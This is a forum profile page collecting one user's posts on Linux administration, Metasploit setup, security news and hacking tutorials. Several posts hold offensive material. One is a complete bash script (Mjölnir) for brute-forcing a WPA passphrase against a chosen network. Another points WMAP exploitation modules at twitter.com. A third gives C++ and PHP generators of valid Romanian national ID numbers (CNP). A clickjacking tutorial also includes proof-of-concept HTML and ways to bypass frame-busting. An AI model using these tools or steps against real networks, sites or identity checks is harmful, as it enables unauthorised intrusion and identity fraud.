Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    Poate ca unii vor spune rm -rf nume_director Poate unii stiti ca in kernelul de unix, fie el Linux sau FreeBSD exista o limita pentru numarul de argumente pe care le poate primi o comanda. Astfel rm -rf * se traduce prin rm -rf fisier1 fisier2 … Foarte OK. Pana cand numarul de fisiere depaseste maximul numarului de argumente ce poate fi dat unei comenzi. Eroarea care ne loveste e: rm: Argument list too long. (error code: 126). Iata scriptul: #!/bin/bash rec(){ for I in `seq 0 9 `; do echo $1$I rm -rf ./$1$I* [ $? -eq 126 ] && rec $1$I done } rec 1198 EOF Source
  2. Aerosol
    The kernel can be compiled with different methods. Usually every distribution has a method that can be applied easily and smoothly . 1: First downloaded packages are required . 2.6 in Debian Linux kernel versions apt- get install kernel -package ncurses -dev fakeroot wget bzip2 2: Enter the directory / usr / src cd / usr / src 3: downloaded the latest kernel version from the site kernel.org/pub/linux/kernel/v2.6 / .... ( ulitma version) wget kernel.org/pub/linux/kernel/v2.6 / ... 4: unpacking kernel gunzip or bunzip2 program - depends on what version I downloaded gunzip kernel2.6.21.tar.gzip tar- xvf kernel2.6.21.tar linux2.6 cd etc 5: configure the kernel - If you already have a configuration file that we've done we can use it to carry it out quickly configurareaex : execute command: make menuconfig , select obtiunea : Load from external file ( and there define the route to the file old ) after I finished looking at the improvement of the new kernel , and choose or let out new obtiuni.Daca have a default install kernel , it's good to look at all the options of the kernel and choose only the options you really want to use . The options available in the kernel , can be chosen as built in * ( where it will be compiled into the kernel - or we can choose ( as load modules M) which means that the module will be lodat by RAMDisk to be created after compilation . After konfigurat kernel execute the commands: make- kpkg clean fakeroot make- kpkg - revision = custom.1.0 kernel_image Command that creates a kernel deb package format and will show eg kernel -image- 2.6.21.2_custom.1.0_i386.deb 8 : Install the programs that are needed to create initRAMDiskului , which we will need in case if you have compiled kernel modules so as to be ( built in) apt- get install module- init -tools initrd -tools procps 9 : Install the new kernel : dpkg- i kernel -image- 2.6.21.2_custom.1.0_i386.deb 10 : If we need initramdisk (if using modules M - then we ) execute the command in the directory / boot / mkinitrd - o / boot/initrd.img-2.6.21.2 2.6.21.2 11 : The last thing to do - to make sure that we use the loader knows about the new kernel installed ( GRUB , LILO ) - Usually make GRUB automatically update after installing a new kernel , in case if you use lilo - > edit the configuration file / etc / lilo.conf and make changes necesareex : default = Linux image = / vmlinuz label = Linux ( kernel again ) read-only initrd = / boot/initrd.img-2.6.21.2 Credits to: Outside Nancy
  3. Aerosol
    7 video tutoriale interesante
  4. Aerosol
    WMAP is a framework to run scanning against Web applications, designed to be used as a plugin of MetaSploit Framework, has a simple, but extremely powerful architecture in comparison with other alternatives open source or commercial currently on the market, the simplicity of this plugin is that depends not on any search engine or web browser to capture data and manipulate them. The libraries that must be installed before proceeding with the execution of the plugin on a Debian/Ubuntu system are: sudo apt-get install libxml-ruby sudo apt-get install libxml2-dev sudo apt-get install libxslt-dev sudo apt-get install libnokogiri-ruby gem install libxslt-ruby gem install msgpack PostgreSQL The first thing we will do is create a new database to store the results of analicis. stuxnet@stuxnet:~$ sudo su postgres [sudo] password for stuxnet: postgres@stuxnet:/home/stuxnet$ createuser metasploit -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) y postgres@stuxnet:/home/stuxnet$ createdb --owner=metasploit metasploit Then in a terminal, type the following: sudo /etc/init.d/./postgresql start After having created the database we will open the metasploit console and type msf > db_connect metasploit:metasploit@127.0.0.1:5432/metasploit Where: User: metasploit (Replace with your user ) Passwd: metasploit (Replace with your password) After having created the database we will charge WMAP. msf > load wmap We then proceed to covertirlo to target msf > wmap_sites -s 0 1 msf > wmap_targets -t www.twitter.com,199.59.148.10 msf > set DOMIAN www.twitter.com msf > wmap_targets -l We then proceed to launch modules of exploitation that will be charged. msf > msf > wmap_run -t Once loaded the modules we proceed to throw them at the target site to make the test of security. msf > wmap_run -e Completion of all the exploration we will check if there is any vulnerability. msf > hosts -c address,svcs,vulns Credit's to : JB
  5. Aerosol
    apt-get update && apt-get upgrade then, we have to install the dependencies needed for msf apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3 we have now to install the required ruby libraries for msf gem install wirble pg sqlite3 msgpack activerecord redcarpet rspec simplecov yard bundler now, let`s install nmap, it is one of msf`s external tools for scanning. mkdir ~/nmap;cd ~/nmap svn co https://svn.nmap.org/nmap cd nmap ./configure make;make install;make clean now with nmap installed, we can create an user and db for postgresql su postgres now, let`s create the user and the database that msf will use from database.yml. createuser msf -P -S -R -D createdb -O msf msf now we can exit. now, let`s download the latest metasploit and install it cd /opt git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework now, let`s create links to the commands bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' ln -s /opt/metasploit-framework/armitage /usr/local/bin/armitage from inside msf folder, run this bundle install to install the supported gem versions create the database.yml in /opt/metasploit-framework/ nano /opt/metasploit-framework/database.yml and paste this inside production: adapter: postgresql database: msf username: msf password: host: 127.0.0.1 port: 5432 pool: 75 timeout: 5 oh and provide the password you entered earlier. now, create and eviroment variable echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/database.yml >> /etc/profile source /etc/profile we still have to install the pcaprub cd /opt/metasploit-framework/external/pcaprub ruby extconf.rb && make && make install it is used in port scanning run msfconsole Have fun with the great penetration testing tool! ~ Credits to neo.hapsis
  6. Aerosol

    RedSnow

    Aerosol posted a topic in Mobile security

    redsn0w version 0.9.15b1, with significant new features supporting restoring to older firmware no longer being signed by Apple. For brevity, we’ll list most of the new features in bullet form Features: restore from any 5.x iOS to any other (up, down or the same) 5.x iOS on all devices as long as you have the correct blobs (see more below) Cydia now included in the tethered 6.0 jailbreak on A4 devices automatically “Just Boot” tethered when qualifying A4 device connects in DFU mode untethered 6.0 jailbreak on old-bootrom 3GS untethered 6.0 hactivation on any 3GS or iPhone4 directly restore pre-A5 devices to earlier firmware — no more complicated 15-step how-to’s with stitching, iTunes errors, and “hosts file” concerns fetch new signed blobs for any IPSW (present or future — no redsn0w update required) using Extras->SHSH Blobs->New block the BB update for any 3GS or iPhone4 restore (past, present, or future — no redsn0w update required) using Extras->Even More->Restore deactivate any iPhone, useful for testing your “official” unlock status through iTunes. (Please only deactivate your own iPhone!) activation status shown on “Even more” page significantly more (very nerdy) info returned by “Identify” button when device is in Normal mode tethered jailbreak of ATV2 supported (but the only thing available for it is the SSH2 custom bundle available here — no Cydia yet. Must use “Select IPSW” for tethered boot of ATV2 for now). auto-exit WTF mode for older devices with broken buttons any time a set of blobs is fetched remotely (from Apple or Cydia), redsn0w also saves them locally (and will check there first if you click “Local”) link
  7. Aerosol
    The Secunia PSI explained The Secunia Personal Software Inspector (PSI) is a free computer security solution that identifies vulnerabilities in non-Microsoft (third-party) programs which can leave your PC open to attacks. Simply put, it scans software on your system and identifies programs in need of security updates to safeguard your PC against cybercriminals. It then supplies your computer with the necessary software security updates to keep it safe. The Secunia PSI even automates the updates for your insecure programs, making it a lot easier for you to maintain a secure PC. Using a scanner like Secunia PSI 3.0 is complementary to antivirus software, and as a free computer security program, is essential for every home computer. Download : http://secunia.com/PSISetup.exe
  8. Aerosol
    Introduction I've seen many posts in forums, enquiring about the possibility of cracking a WPA passphrase without de-auth'ing a wireless client and collecting the handshake. 99.99% of the time, the response has been that such a task is impossible. This is quite disappointing to see, as it is certainly not impossible. Just because it's not built into automated tools such as aircrack-ng or cowpatty, doesn't mean it cannot be done. All that's required is a little lateral thinking and some ingenuity. Before I carry on, fair warning that this current implementation is dog-slow. It attempts to establish a connection with an AP, taking into account collisions, delays, retransmissions etc, we're currently looking at a few seconds a guess. However, the idea of the tool is to provide a PoC. I'm sure there are more efficient ways of doing this, but I wanted to demonstrate that you cannot always rely on automated tools to hold your hand. Mjölnir The script is called Mjölnir (the Norse translation of Thor's Hammer). It is a simple wrapper around the wpa_supplicant and wpa_cli tools, which takes some input from the user and runs loops to establish a connection to the AP. Download: https://github.com/rasta-mouse/Mjolnir/blob/master/mjolnir.sh Name: mjolnir.sh #!/bin/bash ### text colours ### red='\e[0;31m' green='\e[0;32m' blue='\e[0;34m' nc='\e[0m' ### art ### echo ' __ __ _ _ _ _ _ | \/ (_(_) (_| | (_) | \ / |_ ___ | |_ __ _ _ __ | |\/| | |/ _ \| | _ \| | __| | | | | | (_) | | | | | | | |_| |_| |\___/|_|_| |_|_|_| _/ | |__/ v1 ' ### input & variables ### loc=/tmp/wpa_supplicant.conf echo -n "Target ESSID: " read ssid if [ -z "$ssid" ]; then echo -e "${red}[x]${nc} ESSID required." exit 1 fi echo -n "Password List (full path): " read list if [ ! -f "$list" -o -z "$list" ]; then echo -e "${red}[x]${nc} File not found." exit 1 fi echo -n "Wireless Interface (e.g. wlan0): " read int if [ -z "$int" ]; then echo -e "${red}[x]${nc} Interface required." exit 1 fi echo "" echo -e "${blue}[-]${nc} Launching..." psk=$(cat $list) ### functions ### function killSup { echo -e "${blue}[-]${nc} Killing instances of wpa_supplicant" killall wpa_supplicant > /dev/null 2>&1 } function prepConf { echo -e "${blue}[-]${nc} Prepping wpa_supplicant.conf" echo ctrl_interface=/var/run/wpa_supplicant > $loc } function prepSup { wpa_supplicant -B -Dwext -i${int} -c$loc > /dev/null 2>&1 pid=$(ps aux | grep [D]wext | awk '{ print $2 }') echo -e "${blue}[-]${nc} Daemonising wpa_supplicant (PID "$pid")" sleep 15 } function clearNetworks { echo -e "${blue}[-]${nc} Purging network list" for i in `wpa_cli -i${int} list_networks | grep ^[0-9] | cut -f1`; do wpa_cli -i${int} remove_network $i; done > /dev/null 2>&1 sleep 3 } function addNetwork { echo -e "${blue}[-]${nc} Adding network entry for ${ssid}" wpa_cli -i${int} add_network > /dev/null 2>&1 wpa_cli -i${int} set_network 0 auth_alg OPEN > /dev/null 2>&1 wpa_cli -i${int} set_network 0 key_mgmt WPA-PSK > /dev/null 2>&1 wpa_cli -i${int} set_network 0 proto RSN > /dev/null 2>&1 wpa_cli -i${int} set_network 0 mode 0 > /dev/null 2>&1 wpa_cli -i${int} set_network 0 ssid '"'${ssid}'"' > /dev/null 2>&1 sleep 3 } function mainGuess { echo -e "${blue}[-]${nc} Bruteforcing ${ssid}" for psk in `cat $list`; do wpa_cli -i${int} set_network 0 psk '"'${psk}'"' > /dev/null 2>&1 wpa_cli -i${int} select_network 0 > /dev/null 2>&1 wpa_cli -i${int} enable_network 0 > /dev/null 2>&1 wpa_cli -i${int} reassociate > /dev/null 2>&1 sleep 12 netStatus=$(wpa_cli -iwlan0 status | grep wpa_state | cut -d"=" -f2) if [ $netStatus == 'COMPLETED' ]; then echo -e "${green}[+] ${nc}$ssid: $psk" fi done } function cleanUp { echo -e "${blue}[-]${nc} Cleaning up..." killall wpa_supplicant > /dev/null 2>&1 rm $loc > /dev/null 2>&1 } killSup prepConf prepSup clearNetworks addNetwork mainGuess & wait cleanUp
  9. Aerosol
    There are stack buffer overflows in two components of a Honeywell point-of-sale software package that can allow attackers to run arbitrary code on vulnerable systems. The vulnerabilities lie in the HWOPOSScale.ocx and HWOPOSSCANNER.ocx components of Honeywell’s OLE for Retail Point-of-Sale package, which is designed to help integrate PoS hardware with Windows PoS systems. Versions of the Honeywell software prior to 1.13.4.15 are vulnerable to this flaw and the vendor has released a patch to address the problem. “The Honeywell OPOS Suite provides a standard programming interface that allows POS hardware to be easily integrated into retail POS systems based on Microsoft Windows operating systems. Honeywell OPOS Suite versions prior to version 1.13.4.15 are vulnerable to stack buffer overflows in HWOPOSScale.ocx and HWOPOSSCANNER.ocx,” the Honeywell advisory says. “In both HWOPOSScale.ocx and HWOPOSSCANNER.ocx, the controls do not check the length of an attacker-supplied string to the Open method before copying it into a fixed length buffer on the stack. This allows an attacker to execute arbitrary code in the context of the browser process.” Point-of-sale systems have been a frequent target for attackers in recent years, as they often are not as well-protected as other parts of a given network. In many cases, PoS devices have little or no security on them, something that attackers know, and when they’re able to get malware onto a PoS system, they know they can quickly gather a large volume of payment card data. PoS compromises have been at the heart of many major breaches, including the Home Depot breach, the attack on Target in 2013 and several others. There are families of malware specifically designed to take advantage of weaknesses in PoS systems, with Backoff being the most notorious of this genre. Attackers often compromise another portion of a target network, sometimes using stolen or weak credentials, and then move from there to the PoS system to accomplish their goal. Source
  10. Aerosol
    Sony Pictures has contacted some US news outlets in an attempt to limit the damage caused by the hacking of its internal computer system last month. The studio, its letter informed them, "does not consent to your possession... dissemination, publication... or making any use of the stolen information". Script details, salary data and private email correspondence have been leaked in the wake of the huge cyber attack. A group calling itself Guardians of Peace has claimed responsibility. It is believed that the attack was triggered by Sony's new film The Interview, a comedy that features a plot to assassinate North Korea's leader Kim Jong-un. North Korea has denied being involved in the attack, but has described it as a "righteous deed" that may have been carried out by its "supporters and sympathisers". Variety, the New York Times and the Hollywood Reporter are among the publications understood to have been contacted by Sony's legal team. A New York Times spokeswoman said its coverage would "take into account both the significance of the news and the questions of how the information emerged". Emails involving Angelina Jolie and Leonardo DiCaprio have been made public Some of the emails released have contained embarrassing exchanges about some of Hollywood's biggest stars, among them Angelina Jolie and Leonardo DiCaprio. The producers of the new James Bond film Spectre have also confirmed that an early version of its script was stolen and "illegally made public by hackers". George Clooney is the latest movie star to have had his personal emails disseminated, revealing he was personally stung by the critical reaction to his recent film The Monuments Men. "I fear I've let you all down," the actor and director wrote in an exchange with Sony Pictures Entertainment co-chairman Amy Pascal. The revelation that Jennifer Lawrence and Amy Adams were paid less than their male co-stars in American Hustle has also been widely reported. Screenwriter Aaron Sorkin is among those to have criticised the media's apparent complicity with the hackers, accusing it of being "morally treasonous". According to Variety's Andrew Wallenstein, however, publishing the stolen data is "problematic but necessary" because it "is in the public domain" and "unavoidable". Source
  11. Aerosol
    The character of Hector Monsegur, a former LulzSec hacker who went by the nom de guerre "Sabu," is a complicated one. Here's a boy who grew up in poverty, many members of his immediate family serving time in jail. Here's a kid who found an outlet in the Hacker Manifesto. Here's a father who adopted and raised two girls after their mother, his aunt, was arrested. Here's an activist who helped provoke the repressive Tunisian government. Here's a villain who, in the eyes of many, betrayed his friends to protect himself when the FBI came knocking. Shakespeare it ain't, but it is an interesting tale. After years of underground online activity and thousands of hacks, FBI agents presented Monsegur with a long list of charges against him, including some 12 counts of hacking and related fraud. However, the agents also presented a greater threat: to take away the two girls he was fostering and hand them to protective services. This and only this, says Monsegur, led to his becoming an FBI informant. Between June 2011 and March 2012, Monsegur would publicly maintain his role as one of the world's most prominent hackers and general haters of the establishment. In fact, as the days counted down and his work with the FBI was about to be revealed, he grew even more vocal, saying things like "without informants or subpoenas the feds would be lost." He also said "CIA wouldn't hire me and the feds I think would love just to throw me under a prison somewhere. I'm useless to them." Actually, he was pretty useful. According to the FBI, the man behind Sabu helped stop some 300 hacks against government websites. Information obtained by agents watching Monsegur's every move through 2011 and early 2012 also led to the arrest of numerous suspected international hackers, including activist Jeremy Hammond, who is currently serving a 10-year sentence for his role in the Strafor email leak. Hammond maintains that Monsegur, under FBI direction, provided both the encouragement and the tools for the attack. Monsegur, for his part, denies any acts of entrapment. Monsegur's cooperation with the FBI was so effective that, at his sentencing, federal prosecutors took the unusual step of detailing just how helpful he was. He was released after having served seven months in prison and would face only a year of probation rather than the possible decades of incarceration. These days, Monsegur maintains that he does not have a PC and is making minimal use of the Internet -- he is allowed, but he's concerned the actions of others might be blamed on him. Better just to steer clear. Still, he has plenty of opinions about the current state things. He believes the most recent Sony hack, for example, is simply a continuation of the many attacks against the corporation. "Sony has been compromised for at least six years that I know of," he said. "The people who are complaining to be GOP or whatever, are the people that owned Sony way back when... This is not a new hack." As to what comes next, Monsegur says those seven months behind bars exposed him to a new passion: teaching. "I feel like I want to help people in general with understanding privacy." The former Sabu hopes to educate others about who they can trust and how they can protect themselves in a world increasingly full of scams, traps and phishing attacks. That sort of knowledge is a valuable thing, and it's certainly hard to imagine a better teacher. For more of Hector Monsegur's story, please check out Charlie Rose's full interview. Source
  12. Aerosol
    Uite unul si in C++ facut de modoran e destul de vechi. #include <cstdio> #include <cstdlib> #include <ctime> #include <string> #include <cmath> using namespace std; string calculate_cnp(string cnptemporar); void IntToString(int i, string & s); bool an_bisect(int year); int main(int argc, char *argv[]){ srand( time(NULL) ); time_t rawtime; char buffer [3]; time ( &rawtime ); strftime (buffer,3,"%y",localtime ( &rawtime )); string s_an = buffer; int year = atoi(s_an.c_str()); year += 100; year -= 25; s_an.clear(); int sex = rand() %2; sex++; int an = rand() %10; an += year; int luna = rand() %12; luna++; int zi = 0; switch(luna){ case 1: case 3: case 5: case 7: case 8: case 10: case 12: zi = rand() %31; zi++; break; case 4: case 6: case 9: case 11: zi = rand() %30; zi++; break; case 2: if(an_bisect(an)){ zi = rand() %29; zi++; } else { zi = rand() %28; zi++; } break; default: break; } int judet = rand() %52; judet++; while(judet >= 47 && judet <= 50){ judet = rand() %52; judet++; } int registru = rand() %999; registru++; string cnptemporar; string buf; IntToString(sex, buf); cnptemporar += buf; buf.clear(); IntToString(an, buf); cnptemporar += buf; buf.clear(); if(luna < 10){ buf = "0"; cnptemporar += buf; buf.clear(); } IntToString(luna, buf); cnptemporar += buf; buf.clear(); if(zi < 10){ buf = "0"; cnptemporar += buf; buf.clear(); } IntToString(zi, buf); cnptemporar += buf; buf.clear(); if(judet < 10){ buf = "0"; cnptemporar += buf; buf.clear(); } IntToString(judet, buf); cnptemporar += buf; buf.clear(); if(registru < 10){ buf = "00"; cnptemporar += buf; buf.clear(); } else if(registru < 100 && registru > 10){ buf = "0"; cnptemporar += buf; buf.clear(); } IntToString(registru, buf); cnptemporar += buf; buf.clear(); buf = calculate_cnp(cnptemporar); printf("Generated CNP: %s\n", buf.c_str()); return 0; } string calculate_cnp(string cnptemporar){ int x = 0; string sumaverificare("279146358279"); string s1; string s2; string buf; string cnp = cnptemporar; int i1 = 0; int i2 = 0; int rezadunare = 0; while(x < 12){ s1 = sumaverificare.substr(x,1); s2 = cnptemporar.substr(x,1); i1 = atoi(s1.c_str()); i2 = atoi(s2.c_str()); s1.clear(); s2.clear(); rezadunare = rezadunare + (i1 * i2); x++; } int rest = rezadunare / 11; int cifra = rezadunare - (11 * rest); if(cifra == 10){ cifra = 1; } //printf("cifra = %d\n",cifra); IntToString(cifra, buf); cnp += buf; buf.clear(); return cnp; } void IntToString(int i, string & s) { s = ""; if (i == 0) { s = "0"; return; } if (i < 0) { s += '-'; i = -i; } int count = log10(i); while (count >= 0) { s += ('0' + i/pow(10.0, count)); i -= static_cast<int>(i/pow(10.0,count)) * static_cast<int>(pow(10.0,count)); count--; } } bool an_bisect(int year) { return year%4 == 0 && (year %100 != 0 || year%400 == 0); } si inca unul in PHP Source <?php /** * Generare CNP ptr anumiti parametri varsta-sex-rezident * * @example generareCnp(1,19) * @return cnp Cnp aleator valid */ function generareCnp($sex,$varsta,$rezident=false) { $errorMsg = 'EROARE'; $sirCiudat ='279146358279'; $strain = ($sex==9) ? true:false; $sexVector =array('1','2','9'); //ptr amuzament //Verificarile datelor if(!in_array($sex,$sexVector)) { return $errorMsg; } if (!is_bool($rezident)) { return $errorMsg; } $an=date(Y)-$varsta; // Daca s-a nascut inainte de 1900 $sex = 3 sau 4 if ( $an < 1900 && !$rezident && !$strain) $sex = $sex + 2; // Daca s-a nascut dupa 2000 $sex = 5 sau 6 if ( $an > 2000 && !$rezident && !$strain) $sex = $sex + 4; //daca este rezident if ($rezident) $sex = $sex+6; $luna=rand(1,12); $zi = rand(1,31); //daca este un copil care s-a nascut anul acesta atunci avem grija ca data generata sa nu fie mai mare decat data de azi if ($an == date('Y')) { $luna = rand(1,date('m')); $ziua = rand(1,date('d')); } $date = new DateTime($an.'-'.$luna.'-'.$zi); $judet=rand(1,52); $judet=($judet<10) ? '0'.$judet : $judet; $control = rand(1,999); if ($control<10) { $control='00'.$control; } else if ($control<100) { $control='0'.$control; } $cnp = $sex . $date->format("ymd") . $judet.$control; $suma=0; for($i=0;$i<=11;$i++) { $suma+=$sirCiudat[$i]*$cnp[$i]; } $rest = $suma%11; $cifraControl = ($rest==10) ? 1 : $rest; $cnp.=$cifraControl; if (strlen($cnp)!=13 ) { return $errorMsg; } else return $cnp; } for($i=0;$i<100;$i++) { echo generareCnp(rand(1,2),rand(0,209))."\n"; } ?>
  13. Aerosol
    Introduction Clickjacking was first publicized by Jeremiah Grossman and Robert “Rsnake” Hansen in 2008. Clickjacking is an attack that is possible only by the use of iframes. Iframes are the HTML components that are used to load a webpage in a frame. Their height and width can be set to any size depending on the requirements of the designers. Iframe has an attribute named opacity to make the iframe opaque or even transparent, depending on the requirement. Clickjacking is possible because of the <iframe> tag and an attribute offered by HTML, which is “opacity”. Clickjacking is a combination of two independent words: Click and Hijacking. Here, Click refers to “mouse clicks” and Hijacking refers to “forcing a victim to click”. Clickjacking means forcing a victim to click on a page on which the attacker wants him to click to perform the desired malicious activity, without his willingness to click. There are a lot of attacks discovered these days that have clickjacking working in the backend, just to raise the popularity of the site, stealing one’s session, or stealing a victim’s confidential information such as credit card information, etc. Now in this article we will discuss identification of a clickjacking vulnerable site, different ways to perform clickjacking, its preventions, and real world examples of clickjacking. Visualization All of you are well familiar with the concept of stacking – here, in clickjacking, an iframe is stacked on top of the genuine site, and the iframe on top has the attacker’s malicious site. As the iframe is set to be transparent with the help of the opacity feature, the victim will have no idea that instead of clicking on the site he is willing to, he is clicking on an attacker’s malicious site. In this image, you can easily visualize that on top of a genuine page there exists an iframe, i.e. partially visible for you to visualize, but in reality it will be invisible. Whenever a victim clicks on the play button, then the event that will fire is actually the one that is in the opaque iframe. This is how a victim’s clicks are hijacked to do whatever he doesn’t want to do but the attacker wants him to do. Exploitation Basic ingredients to prepare for a clickjacking attack are: Iframe – This is a frame in HTML that frames a webpage in it. Z-index – decides the iframe index in the stack. Opacity – makes the iframe transparent. Position: Absolute – lines up the iframe with the dummy page. Sample Code to test a website for Clickjacking: <html> <a href="#">Play Now!!!</a> <h1 style="text-align:center">Play Game</h1> <script> window.onbeforeunload = function() { return " Do you want to leave click.site?"; } </script> <body> <p style="font-size: 38px;"align=center>Best Game of the season</p> <div style="z-index:10; opacity:0.4; position:absolute; top:0px; left:200px; "> <iframe scrolling="no" style=" width:800px; height:500px;" src="http://www.torrentz.eu/"> </iframe> </div> <div style="top:0px; left:200px;"> </div> </body> </html> On clicking the Play Now!!! button, the victim will be redirected to the torrentz search page. Preventions Client Side Protections: No script Web Browser Plug-ins Frame Busting Frame Busting is a piece of code that is embedded in the webpage to prevent loading of any webpage in the sub frame. Example frame busting code is: If ( top.location != location ) top.location = self.location; Frame Busting code generally consists of a conditional-statement and a counter-action. Ways to Bypass Frame Busting are: Double Framing: The parent.location parameter works well in the frame busting code if victim’s page is framed by only one frame. But if the attacker encloses the victim’s page by two or more frames then parent.location violates security. Exploiting the XSS Filter: Victim’s frame busting code: <script> if ( top != self ) { top.location=self.location; } </script> Attacker’s inserted code: <iframe src=" http:/ /www.attackersite.com/?v=<script >if ' '> This code inserted by the attacker will block the frame busting code because XSS filters will match the regular expression starting with “<script> if” and filter out all the javascript code starting with “<script> if”, hence the attacker’s frame will beloaded. IE Restricted Zone: Mostly the frame busting techniques rely on JavaScript. If JavaScript is disabled then the frame busting code will not work. To sort out this problem, IE included an attribute named security=”restricted” to identify frames coming from restricted zones and allowing them restricted access to the client’s browser, i.e. such frames cannot load JavaScript and they cannot access cookies stored on the browser, thus session riding becomes difficult. Example: <iframe src=" http://www.attackersite.com" security=" restricted "> </iframe> OnBeforeUnload Event: This is used to bypass frame busting code in the case when frame busting code wants to destroy the iframe and loads the source defined in the iframe as an entirely new web page. <script> window.onbeforeunload = function() { return " Do you want to leave fictitious.site?"; } </script> Server Side Protections HTTP X-Frame Options HTTP X-Frame Options are the best defence against Clickjacking attacks. HTTP X-Frame Options allow or disallow the pages of victim domain to be rendered in an iframe on an attackers site. This Option is allowed in the HTTP Response Header. For example: Rendering the Facebook’s Like button in an invisible iframe just above the Click Here button on the attaker’s evil page was the most popular example of a Clickjacking attack. This is also abbrievated as Likejacking. Facebook protected itself from this attack by using the HTTP X-Frame Options on every page of the Facebook website that is not to be rendered in any iframe on any other domain. Options available in HTTP X-Frame Header Options: SAMEORIGIN: The document will be rendered in the iframe only if the iframe content and the iframe containing site has the same origin, i.e. same domain. DENY: The document or webpage will not be rendered in an iframe, even at the parent site. ALLOW-FROM URI:The document or webpage can be rendered in the iframe only at the domains that are specified in the ALLOW-FROM option. This ALLOW-FROM option does not include wild card characters and multiple entries. Google Chrome and Safari browsers do not support this option. Apache Server Configuration Modification To configure Apache to send the X-Frame Options header for all pages, add this to your Apache web server’s configuration file: Header always append X-Frame-Options <OPTION> Prohibited use of HTTP X-Frame Options HTTP X-Frame should not be used this way, because browsers can ignore the header if specified in the <meta> tag. So this way of implementing HTTP X-Frame option should be ignored: <meta http-equiv="X-Frame-Options" content="deny"> CONCLUSION The severity caused by Clickjacking attacks is very high, but it is very simple to prevent the attacks. As discussed above, we can easily prevent clickjacking attacks by the use of HTTP X-Frame Options on all those pages that the victim doesn’t want to render in any attacker’s iframe. This prevention is widely supported by all the latest web browsers. The frame busting technique has several flaws in it, but it is also appreciated for older browsers such as IE 7 or older that don’t support HTTP X-Frame Options. Source
  14. Aerosol
    Introduction Bacula was specifically designed for backup jobs in a server environment, where servers have IP addresses that don’t change regularly and are always up and running. Mobile devices usually connect to the network by using a cable (when an employee comes to the office) or through a VPN (when an employee connects to the corporate environment from home). Bacula works by a director initiating the connection with a file daemon on a regular basis, instructing it to send the data to a storage daemon. The communication between the mobile device and storage daemon is usually not problematic, since we only need to open TCP port 9103 to allow the mobile device to connect to the storage daemon. The problems occur when the mobile device is not present in the network and director wants to connect to it to instruct it to backup certain files. The problem is that the mobile device is not present at that time, which results in connection timeout on director’s endpoint. To solve the problem, the mobile device file daemon must initiate the connection with the director by notifying it about its presence. The best way to do that is by allowing the client to connect to the director by using bconsole and issuing the relevant commands to initiate the backup. We have to configure Bacula to use an empty schedule on the mobile device job in order to avoid failed backup attempts. We can do that by creating the Schedule definition block, which only has Name element defined without the Run element. Next we have to reference that schedule element in Job definition as presented below. This will ensure that backup will never be initiated from Bacula director, thus preventing errors when mobile device is not accessible. Job { Name = "MyClient" JobDefs = "DefaultJobClients" Client = myclient-fd FileSet = "FilesMyClient" Pool = PoolMyClient Schedule = "EmptyCycle" } Schedule { Name = "EmptyCycle" } We disabled the backup being initiated by the Bacula director, which is normally responsible for running the backup. Therefore, its the client’s responsibility to run the backup whenever it’s plugged into the network. In order to do that, we have to allow the client to access the director via bconsole. In order to do that, we have to add the Console element to the bacula-dir.conf configuration file as presented below. Console { Name = myclient Password = "b.n2?,.)FU]$/,i`|lD8NZ79k.8xykOeqNjy8z" CatalogACL = MyCatalog CommandACL = run, status ClientACL = MyClient JobACL = MyClient PoolACL = PoolMyClient StorageACL = File FileSetACL = FilesMyClient } Console { Name = myclient Password = "b.n2?,.)FU]$/,i`|lD8NZ79k.8xykOeqNjy8z" CatalogACL = MyCatalog CommandACL = status, .status, list JobACL = *all* } The Name and Password configuration options must match the ones specified in the bconsole.conf configuration file on the client, which is presented below. Note that the password specified by the Director block is not an actual password and it shouldn’t be – it’s dangerous to use it on the client side, since the client then has complete control over the Bacula director. Only the password to Console block must be correct in order for client to be able to do certain actions according to the configuration ACL lines. Director { Name = baculaserver-dir DIRport = 9101 address = baculaserverbox Password = "NotMyPassword" } Console { Name = myclient Password = "b.n2?,.)FU]$/,i`|lD8NZ79k.8xykOeqNjy8z" } The following ACL configuration options are supported in the Console element block: JobACL: specify a list of job resource names that can be accessed by the console. ClientACL: specify a list of client resource names that can be accessed by the console. StorageACL: specify a list of storage resource names that can be accessed by the console. ScheduleACL: specify a list of schedule resource names that can be accessed by the console. PoolACL: specify a list of pool resource names that can be accessed by the console. FileSetACL: specify a list of fileset resource names that can be accessed by the console. CatalogACL: specify a list of catalog resource names that can be accessed by the console. CommandACL: specify a list of console commands that can be executed by the console. WhereACL: specify where the restricted console can restore files. To allow the client to initiate the job run for a specific client, we need to use CommandACL to specify the commands the client is allowed to execute. If we try to execute an unauthorized command, a message about the invalid command will be displayed on the screen. To allow the client to initialize the backup, the CommandACL must include the run command, but it’s also good to include the status command so we can check whether the job has been run successfully. The other ACL configuration options must also be specified, so the commands have access to the requested resources like Catalog, Client, Job, Pool, Storage and FileSet block elements. Without those configuration options, the client won’t be able to initiate the job by himself. There’s one more command that we need to give the client access to, and that’s the setip command. Since the mobile device can receive a different IP every time it connects to the networks, we must let the director know about its new IP, which we can do by using the setip command. Otherwise, the director will try to connect to the file daemon at a different IP address, which is not present on the network and the job won’t be executed. Whenever executing the setip command I received the “Unauthorized command from this console” error message; this is because the console name should be the same as client name, after which the setip will work flawlessly. Let’s now test the setip option. First set the DNS we use in the bacula-dir.conf for our client machine to an address that doesn’t exist; we can do that in our internal NS server. After that we can issue the following status command in bconsole to instruct bacula director to connect to the client’s file daemon. Below we can see that: *status client=myclient-fd yes Connecting to Client myclient-fd at myclient:9102 Failed to connect to Client myclient-fd. baculaserver-dir JobId 0: Fatal error: bsock.c:133 Unable to connect to Client: myclient-fd on myclient:9102. ERR=Connection timed out Next, on the client we have to issue the setip comand to set the client IP address to its current address 192.168.1.5. # bconsole *setip 192.168.1.5 Client "myclient-fd" address set to 192.168.1.5 Next, we have to reissue the status command at the server side. This time the Bacula director will be able to connect to the client machine, which is seen below. *status client=myclient-fd yes 